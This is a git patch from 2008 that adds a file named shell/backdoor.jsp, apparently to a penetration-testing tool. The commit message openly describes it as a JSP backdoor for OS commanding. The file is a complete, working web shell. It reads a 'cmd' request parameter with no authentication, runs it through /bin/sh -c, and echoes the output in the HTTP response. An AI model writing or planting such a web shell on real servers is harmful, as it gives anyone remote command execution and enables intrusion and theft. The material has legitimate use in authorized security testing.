From 67e1be07a4c08a10b5e1426b93bab9d1387f9769 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Sun, 2 Nov 2008 19:32:04 +0000
Subject: [PATCH] Added a JSP backdoor (GET /.../backdoor.jsp?cmd=<os command>)
 for long term new features for OS commanding

---
 shell/backdoor.jsp | 47 ++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 47 insertions(+)
 create mode 100644 shell/backdoor.jsp

diff --git a/shell/backdoor.jsp b/shell/backdoor.jsp
new file mode 100644
index 000000000..daf430927
--- /dev/null
+++ b/shell/backdoor.jsp
@@ -0,0 +1,47 @@
+<%@ page import="java.io.*" %>
+<%
+      
+Process p;
+String s, cmd, html;
+
+cmd = request.getParameter("cmd");
+if (cmd == null) {
+    cmd = "pwd";
+}
+
+String []bashcmd = {"/bin/sh","-c",cmd}; 
+
+html = request.getParameter("html");
+
+if (html != null) {
+    out.println("<HTML>");
+}
+
+p = Runtime.getRuntime().exec(bashcmd);
+
+BufferedReader stdInput = new BufferedReader(new 
+					     InputStreamReader(p.getInputStream()));
+
+BufferedReader stdError = new BufferedReader(new 
+					     InputStreamReader(p.getErrorStream()));
+
+
+
+while ((s = stdInput.readLine()) != null) {
+    out.println(s); 
+    if (html != null) {
+	out.println("<br>");
+    }
+}
+
+
+while ((s = stdError.readLine()) != null) {
+    System.out.println(s);
+    if (html != null) {
+	out.println("<br>");
+    }
+
+}
+
+
+%>
\ No newline at end of file